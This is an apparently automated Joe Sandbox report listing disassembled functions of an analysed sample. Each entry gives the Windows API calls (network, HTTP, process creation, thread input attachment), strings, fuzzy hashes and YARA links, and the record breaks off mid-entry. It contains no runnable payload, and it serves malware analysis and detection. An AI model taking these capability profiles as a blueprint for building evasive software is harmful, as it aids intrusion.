Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 3851762fa6b1857782c13e53846b8210f2984dd3df6eb0261fd241b5706b0fc1
Instruction ID: 4b67ce7966365dc2facbec9cd77856be1c5568b0cd0bcf6df1207fb4bf81ca98
Opcode Fuzzy Hash: 3851762fa6b1857782c13e53846b8210f2984dd3df6eb0261fd241b5706b0fc1
Instruction Fuzzy Hash: D7614775900308AFDB11DFA4CC81EEE77F8AB09710F104199FA15AB2A1D771A985EBA0

Function 00EE6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EE6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00EE6C18
VariantInit.OLEAUT32(?), ref: 00EE6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00EE6C4A
VariantCopy.OLEAUT32(?,?), ref: 00EE6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00EE6CB1
VariantClear.OLEAUT32(?), ref: 00EE6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00EE6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EE6CDC
VariantClear.OLEAUT32(?), ref: 00EE6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EE6CF9

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 566e521cf404cb79e0cb1aa1aa20d2ccffb5c693740a95cb645d42d27495544e
Instruction ID: 2cea0bfe9c9da4c77ebfdd55277c78176e3f02eea732f8ed61a2a1586d25061e
Opcode Fuzzy Hash: 566e521cf404cb79e0cb1aa1aa20d2ccffb5c693740a95cb645d42d27495544e
Instruction Fuzzy Hash: 75418E31A0021D9FCF04DFA9D8449EEBBB9EF18344F01D069E955E7261CB31A949CF90

Function 00F05732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F05793
inet_addr.WSOCK32(?,?,?), ref: 00F057D8
gethostbyname.WSOCK32(?), ref: 00F057E4
IcmpCreateFile.IPHLPAPI ref: 00F057F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F05862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F05878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F058ED
WSACleanup.WSOCK32 ref: 00F058F3

Strings

Ping, xrefs: 00F05816

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 9c8af7cbf3a7a4488e522bb624887e0ef21fefc09e9dc3d47da02263403696f8
Instruction ID: f2222bc7a51259dea0c976edf32d9294ae0dd8bf871208155d0ac43628d7b474
Opcode Fuzzy Hash: 9c8af7cbf3a7a4488e522bb624887e0ef21fefc09e9dc3d47da02263403696f8
Instruction Fuzzy Hash: 4C514C31A046009FDB11DF65DC45B6ABBE4EF49B20F048929F956EB2E1DBB0E804EF41

Function 00EFB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EFB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EFB546
GetLastError.KERNEL32 ref: 00EFB550
SetErrorMode.KERNEL32(00000000,READY), ref: 00EFB5BD

Strings

NOTREADY, xrefs: 00EFB57C
INVALID, xrefs: 00EFB58F
READY, xrefs: 00EFB596
UNKNOWN, xrefs: 00EFB575
READONLY, xrefs: 00EFB588

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 3bea3d607be03068fd7324dfda85afd17aa4c83b7fc57b96275082aeb56d20b7
Instruction ID: 12cd16fde8d287da6b659cc82e97ce23f123c1e091e90a40b632aa74c4a104d0
Opcode Fuzzy Hash: 3bea3d607be03068fd7324dfda85afd17aa4c83b7fc57b96275082aeb56d20b7
Instruction Fuzzy Hash: FF31A135A0020DEFDB00EB68C845AFE7BB5FF44314F109029EA05B7291DB74DA46DB41

Function 00EE8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Part of subcall function 00EEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EEAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EE9014
GetDlgCtrlID.USER32 ref: 00EE901F
GetParent.USER32 ref: 00EE903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00EE903E
GetDlgCtrlID.USER32(?), ref: 00EE9047
GetParent.USER32(?), ref: 00EE9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00EE9066

Strings

ListBox, xrefs: 00EE8FD1
ComboBox, xrefs: 00EE8F9C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 0f6a1e81a525784515809c2d64fb542bd2393dda78d8190eedba54a9407ee57f
Instruction ID: e11bbb35f3184e5afaac84d2f5c4bb6c5eec0777c49144ce9983065a67b9ca94
Opcode Fuzzy Hash: 0f6a1e81a525784515809c2d64fb542bd2393dda78d8190eedba54a9407ee57f
Instruction Fuzzy Hash: 6521D870A0024CBBDF15ABA1CC85EFEBBB5EF49310F104129B961A72A1DB755819DB20

Function 00EE907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Part of subcall function 00EEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EEAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EE90FD
GetDlgCtrlID.USER32 ref: 00EE9108
GetParent.USER32 ref: 00EE9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00EE9127
GetDlgCtrlID.USER32(?), ref: 00EE9130
GetParent.USER32(?), ref: 00EE914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00EE914F

Strings

ListBox, xrefs: 00EE90BC
ComboBox, xrefs: 00EE9087

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 34d1c6e5ba57a182b337ae70fddcc9f774298545c1fb53d429def5806732fbfa
Instruction ID: 8d3a34c61758642f4ab2d9817538b11c7912b5a88312570b5e9acdbd7271babd
Opcode Fuzzy Hash: 34d1c6e5ba57a182b337ae70fddcc9f774298545c1fb53d429def5806732fbfa
Instruction Fuzzy Hash: 4321DA75A0024CBBDF11ABA5CC85EFEBBB4EF49300F114029F951A72A2DB755419EB20

Function 00EE9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00EE916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00EE9184
_wcscmp.LIBCMT ref: 00EE9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EE9211

Strings

list, xrefs: 00EE91F3
smallicons, xrefs: 00EE91D9
details, xrefs: 00EE91BF
largeicons, xrefs: 00EE91A5
SHELLDLL_DefView, xrefs: 00EE9190

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 36dc5fadb0784bbb2d0c0483f129f4a9d815c2d470802eaef5b47d3c6b2ad9c2
Instruction ID: efc3fe99c549f824460f6d59d8ae89ac3a8984df55430f6e67b2899b34a0f569
Opcode Fuzzy Hash: 36dc5fadb0784bbb2d0c0483f129f4a9d815c2d470802eaef5b47d3c6b2ad9c2
Instruction Fuzzy Hash: 61110A3624838BB9FE113626EC06DE73BDC9F19720B201026FE00B50E7FF62A8516555

Function 00F088AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F088D7
CoInitialize.OLE32(00000000), ref: 00F08904
CoUninitialize.OLE32 ref: 00F0890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00F08A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00F08B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F22C0C), ref: 00F08B6F
CoGetObject.OLE32(?,00000000,00F22C0C,?), ref: 00F08B92
SetErrorMode.KERNEL32(00000000), ref: 00F08BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F08C25
VariantClear.OLEAUT32(?), ref: 00F08C35

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: d2032a0fbc5a16ac8a8fe3a2d1ea089c15dd844777bd8bb86373caef1de4c88f
Instruction ID: 6da7387fee4dd2bf4f898aa95f5f57dae7664a21cc3bf4cbfa08435bdc602535
Opcode Fuzzy Hash: d2032a0fbc5a16ac8a8fe3a2d1ea089c15dd844777bd8bb86373caef1de4c88f
Instruction Fuzzy Hash: 1BC148B1608305AFD700DF28C88496BB7E9FF89798F00491DF9899B291DB71ED06DB52

Function 00EF7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00EF7A6C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: ea7a19d89a4dccdf4c7435563af3c8cdf7860baa701ea447109085fd166ec30b
Instruction ID: 2195c22b9c0d1b2446cd8cbff0d4d1ea20777397f3ef543d02604b673b2c1306
Opcode Fuzzy Hash: ea7a19d89a4dccdf4c7435563af3c8cdf7860baa701ea447109085fd166ec30b
Instruction Fuzzy Hash: 41B18B7190820E9FDB00DFA4C884BBEB7F5EF49325F215469EA91F7291D734A941CB90

Function 00EF11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00EF11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EF0268,?,00000001), ref: 00EF1204
GetWindowThreadProcessId.USER32(00000000), ref: 00EF120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EF0268,?,00000001), ref: 00EF121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00EF122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EF0268,?,00000001), ref: 00EF1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EF0268,?,00000001), ref: 00EF1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EF0268,?,00000001), ref: 00EF129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EF0268,?,00000001), ref: 00EF12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EF0268,?,00000001), ref: 00EF12BC

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: b717d2ab23a5e601c4ecba2340ea62464b21e505d3e26fbe1b7d41e8070df42d
Instruction ID: 2ff0eb6eff13935b9876e7cfadbcd13887d96ae4a51f6dc1dbff34269721c8ec
Opcode Fuzzy Hash: b717d2ab23a5e601c4ecba2340ea62464b21e505d3e26fbe1b7d41e8070df42d
Instruction Fuzzy Hash: 4831AE75A0030CFBEB10DF94EC88BB93BADAB54326F118155FA15E71A0E7709D44BB50

Function 00E9FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E9FAA6
OleUninitialize.OLE32(?,00000000), ref: 00E9FB45
UnregisterHotKey.USER32(?), ref: 00E9FC9C
DestroyWindow.USER32(?), ref: 00ED45D6
FreeLibrary.KERNEL32(?), ref: 00ED463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00ED4668

Strings

close all, xrefs: 00E9FAA1

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: d063947465c888cb90461a4d4cac098d3e73ea08bea1c0ff6d347a11340b54ed
Instruction ID: 754c3b417d9ac25472eaad79b6900e38022125d2517f109867e878374cfabbd0
Opcode Fuzzy Hash: d063947465c888cb90461a4d4cac098d3e73ea08bea1c0ff6d347a11340b54ed
Instruction Fuzzy Hash: 0DA17D71701216CFCB29EF14C594A69F3A4EF15714F1562AEE81ABB2A1DB30EC16CF50

Function 00EEA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00EEA439), ref: 00EEA377

Strings

NAME, xrefs: 00EEA1A9
CLASS, xrefs: 00EEA0F6
REGEXPCLASS, xrefs: 00EEA13C
CLASSNN, xrefs: 00EEA119
TEXT, xrefs: 00EEA2AE
INSTANCE, xrefs: 00EEA285

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: d626c16a1d9212ac04c96875cb9bff07440fe8529eb8f6e8779f9521b79493ca
Instruction ID: bd8940b788f61f16e8e24f34d87c1a408004211daac0318755419b548ef90931
Opcode Fuzzy Hash: d626c16a1d9212ac04c96875cb9bff07440fe8529eb8f6e8779f9521b79493ca
Instruction Fuzzy Hash: 2391E630600649AACB08EFA1C442BEEFBB4BF04304F58A12DE959B7151DF307999DBA1

Function 00E92E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00E92EAE

Part of subcall function 00E91DB3: GetClientRect.USER32(?,?), ref: 00E91DDC
Part of subcall function 00E91DB3: GetWindowRect.USER32(?,?), ref: 00E91E1D
Part of subcall function 00E91DB3: ScreenToClient.USER32(?,?), ref: 00E91E45

GetDC.USER32 ref: 00ECCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ECCD45
SelectObject.GDI32(00000000,00000000), ref: 00ECCD53
SelectObject.GDI32(00000000,00000000), ref: 00ECCD68
ReleaseDC.USER32(?,00000000), ref: 00ECCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ECCDFB

Strings

U, xrefs: 00ECCCD0

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: ae19582538ca12074234e75a75784dc4c0402b25689dafbba2e7ed920a4c3638
Instruction ID: 8740b73dc5fd80b75a856a128a9dcb755674209ef53f5b7c25e75b9bd887051d
Opcode Fuzzy Hash: ae19582538ca12074234e75a75784dc4c0402b25689dafbba2e7ed920a4c3638
Instruction Fuzzy Hash: 7171D631500209EFCF218F64C980FEA7FB5FF49315F24526EEE5A66256D7328852DB50

Function 00F01A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F01A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F01A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F01ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F01AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F01AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F01B10
InternetCloseHandle.WININET(00000000), ref: 00F01B57

Part of subcall function 00F02483: GetLastError.KERNEL32(?,?,00F01817,00000000,00000000,00000001), ref: 00F02498
Part of subcall function 00F02483: SetEvent.KERNEL32(?,?,00F01817,00000000,00000000,00000001), ref: 00F024AD

Strings

, xrefs: 00F01B01

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 94bc1c3e795325a0803a7bbfac2a3da14c9ec79abc782ee7eb0908f299d19c13
Instruction ID: 035e050e4d7646804746b993b19d471ed2582a31d998549fbde93dac813e5841
Opcode Fuzzy Hash: 94bc1c3e795325a0803a7bbfac2a3da14c9ec79abc782ee7eb0908f299d19c13
Instruction Fuzzy Hash: 3E4130B1901219BFEB129F50CC89FFB7BACFB48764F008116F9059A181E7749E54BBA0

Function 00F08C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F1F910), ref: 00F08D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F1F910), ref: 00F08D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F08ED6
SysFreeString.OLEAUT32(?), ref: 00F08F00

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 7d50fe275fbdd0c1fc17b597c5f55d339b9737da05ee72e28f12b73fa0efd09e
Instruction ID: 806dc3db24f6b79e6afbd0cd7874138db1e04030d14a1f6f4a8e4caff8bef6a6
Opcode Fuzzy Hash: 7d50fe275fbdd0c1fc17b597c5f55d339b9737da05ee72e28f12b73fa0efd09e
Instruction Fuzzy Hash: F1F15A71A00209EFDF04DFA4C884EAEB7B9FF45364F108458F945AB291DB71AE46EB50

Function 00F0F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F0F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F0F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F0F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F0F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F0F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F0FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F0FA7C
CloseHandle.KERNEL32(?), ref: 00F0FAAB
CloseHandle.KERNEL32(?), ref: 00F0FB22

Memory Dump Source

